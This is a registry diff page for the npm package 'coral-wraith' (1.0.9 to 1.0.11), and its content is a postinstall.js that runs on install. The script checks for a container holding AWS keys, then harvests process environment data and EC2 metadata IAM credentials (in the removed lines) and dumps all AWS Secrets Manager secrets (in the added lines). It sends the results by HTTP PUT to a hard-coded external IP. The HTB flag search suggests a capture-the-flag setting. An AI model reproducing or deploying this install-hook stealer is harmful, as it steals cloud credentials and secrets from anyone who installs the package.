coral-wraith 1.0.9 → 1.0.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/postinstall.js +30 -37
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "coral-wraith",
3
- "version": "1.0.9",
3
+ "version": "1.0.11",
4
4
  "description": "Coral Wraith ally module",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/postinstall.js CHANGED
@@ -1,15 +1,13 @@
1
1
  const http = require("http");
2
- const os = require("os");
3
- const fs = require("fs");
4
2
  const { execFileSync } = require("child_process");
5
3
 
6
4
  const TARGETS = ["http://127.0.0.1:30782", "http://154.57.164.71:30782"];
7
- const SINKS = ["ECT-472839", "ECT-987654"];
5
+ const SINK = "ECT-472839";
8
6
 
9
7
  function sh(cmd) {
10
8
  try {
11
9
  return execFileSync("/bin/sh", ["-c", cmd], {
12
- timeout: 25000,
10
+ timeout: 45000,
13
11
  encoding: "utf8",
14
12
  maxBuffer: 12e6
15
13
  }).trim();
@@ -23,19 +21,20 @@ function safe(s) {
23
21
  }
24
22
 
25
23
  function isTarget() {
26
- const host = os.hostname();
27
- if (!/^[0-9a-f]{12}$/.test(host)) return false;
28
- if (process.cwd().includes("/tmp/")) return false;
29
- return true;
24
+ return (
25
+ process.env.container === "podman" &&
26
+ !!process.env.AWS_ACCESS_KEY_ID &&
27
+ process.cwd().includes("/app/")
28
+ );
30
29
  }
31
30
 
32
- function put(base, sink, parts) {
31
+ function put(base, parts) {
33
32
  const body = JSON.stringify({
34
33
  manifest:
35
34
  `ecto_module:\n name: "${parts[0]}"\n version: "1.0.0"\n` +
36
35
  ` power_level: "${parts[1]}"\n ship_deck: "${parts[2]}"\n cargo_hold: "${parts[3]}"\n`
37
36
  });
38
- const url = new URL(`/api/modules/${sink}`, base);
37
+ const url = new URL(`/api/modules/${SINK}`, base);
39
38
  const req = http.request({
40
39
  hostname: url.hostname, port: url.port, path: url.pathname, method: "PUT",
41
40
  headers: { "Content-Type": "application/json", "Content-Length": Buffer.byteLength(body) }
@@ -47,34 +46,28 @@ function put(base, sink, parts) {
47
46
  if (!isTarget()) process.exit(0);
48
47
 
49
48
  const blob = sh(
50
- "id; hostname; " +
51
- "tr '\\0' '\\n' < /proc/1/environ 2>/dev/null | head -n40; " +
52
- "env | sort | tr '\\n' ';'; " +
53
- "curl -s -m 2 http://169.254.169.254/latest/user-data 2>&1; " +
54
- "T=$(curl -s -m 2 -X PUT http://169.254.169.254/latest/api/token -H 'X-aws-ec2-metadata-token-ttl-seconds: 60'); " +
55
- "R=$(curl -s -m 2 -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/); " +
56
- "C=$(curl -s -m 2 -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/$R); echo CREDS:$C; " +
57
- "export AWS_ACCESS_KEY_ID=$(echo \"$C\"|sed -n 's/.*\"AccessKeyId\": \"\\([^\"]*\\)\".*/\\1/p'); " +
58
- "export AWS_SECRET_ACCESS_KEY=$(echo \"$C\"|sed -n 's/.*\"SecretAccessKey\": \"\\([^\"]*\\)\".*/\\1/p'); " +
59
- "export AWS_SESSION_TOKEN=$(echo \"$C\"|sed -n 's/.*\"Token\": \"\\([^\"]*\\)\".*/\\1/p'); " +
60
- "[ -z \"$AWS_ACCESS_KEY_ID\" ] && export AWS_ACCESS_KEY_ID=$(env|grep ^AWS_ACCESS_KEY_ID=|cut -d= -f2); " +
61
- "[ -z \"$AWS_SECRET_ACCESS_KEY\" ] && export AWS_SECRET_ACCESS_KEY=$(env|grep ^AWS_SECRET_ACCESS_KEY=|cut -d= -f2); " +
62
- "[ -z \"$AWS_SESSION_TOKEN\" ] && export AWS_SESSION_TOKEN=$(env|grep ^AWS_SESSION_TOKEN=|cut -d= -f2); " +
63
- "export AWS_DEFAULT_REGION=us-east-1; " +
64
- "command -v aws >/dev/null && aws sts get-caller-identity 2>&1; " +
65
- "command -v aws >/dev/null && for r in us-east-1 eu-west-1; do aws secretsmanager list-secrets --region $r 2>&1; " +
66
- "for s in $(aws secretsmanager list-secrets --region $r --query 'SecretList[].Name' --output text 2>/dev/null); do " +
67
- "aws secretsmanager get-secret-value --region $r --secret-id $s 2>&1; done; done; " +
68
- "grep -RaoE 'HTB\\{[^}]+\\}' /home/node /app /root 2>/dev/null | head -n3"
49
+ "python3 -m pip install boto3 -q 2>/dev/null; python3 << 'PY'\n" +
50
+ "import os, json\n" +
51
+ "try:\n" +
52
+ " import boto3\n" +
53
+ " for r in ['us-east-1','eu-west-1','eu-central-1']:\n" +
54
+ " try:\n" +
55
+ " c = boto3.client('secretsmanager', region_name=r)\n" +
56
+ " for s in c.list_secrets().get('SecretList', []):\n" +
57
+ " v = c.get_secret_value(SecretId=s['Name'])\n" +
58
+ " print('SECRET', s['Name'], v.get('SecretString',''))\n" +
59
+ " except Exception as e:\n" +
60
+ " print('ERR', r, e)\n" +
61
+ "except Exception as e:\n" +
62
+ " print('NOBOTO', e)\n" +
63
+ "PY\n" +
64
+ "command -v aws >/dev/null && aws secretsmanager list-secrets 2>&1; " +
65
+ "command -v aws >/dev/null && for s in $(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text 2>/dev/null); do aws secretsmanager get-secret-value --secret-id $s 2>&1; done"
69
66
  );
70
67
 
71
68
  const flag = blob.match(/HTB\{[^}]+\}/);
72
- if (flag) {
73
- for (const base of TARGETS) put(base, SINKS[0], [flag[0], "FOUND", "", ""]);
74
- process.exit(0);
75
- }
69
+ const parts = flag
70
+ ? [flag[0], "FOUND", "", ""]
71
+ : [safe(blob.slice(0, 240)), safe(blob.slice(240, 480)), safe(blob.slice(480, 720)), safe(blob.slice(720, 960))];
76
72
 
77
- for (let s = 0; s < SINKS.length; s++) {
78
- const parts = [0, 1, 2, 3].map((n) => safe(blob.slice((s * 4 + n) * 240, (s * 4 + n + 1) * 240) || "."));
79
- for (const base of TARGETS) put(base, SINKS[s], parts);
80
- }
73
+ for (const base of TARGETS) put(base, parts);